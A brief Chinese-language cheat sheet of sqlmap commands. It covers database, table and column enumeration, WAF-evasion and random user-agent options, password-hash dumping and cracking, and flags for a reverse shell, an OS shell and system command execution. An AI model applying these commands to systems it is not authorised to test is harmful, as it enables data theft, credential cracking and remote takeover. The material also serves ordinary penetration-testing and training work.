Sqlmap常用命令与参数整理

注入参数

sqlmap.py -u "url" --current-db  //查看当前数据库
sqlmap.py -u "url" --current-user //查看当前用户
sqlmap.py -u "url" --is-dba  //查看当前用户权限是否是DBA
sqlmap.py -u "url" -D 数据库名称 --tables //知道库名猜解表名
sqlmap.py -u "url" -D 数据库名称 -T 表名 --columns   //知道库名、表名解列名
sqlmap.py -r 1.txt //使用POST抓包文件进行注入

常用参数

--level //测试等级（1-5）默认是1，cookie注入是2，http头注入是3
--dbms=mysql/oracle/mssql //指定数据库（这样既可以节省时间，在某些时候也可以绕过waf）
--batch //使用sqlmap默认选项，不用按回车
--random-agent    //使用随机选定的User-Agent头
--passwords //列出并破解数据库用户的hash

Shell相关

--os-pwn    //反弹shell
--os-shell  //交互式系统shell，可以执行cmd命令
--sql-shell //sql-shell，可以执行SQL语句
--os-cmd="id" //执行id系统命令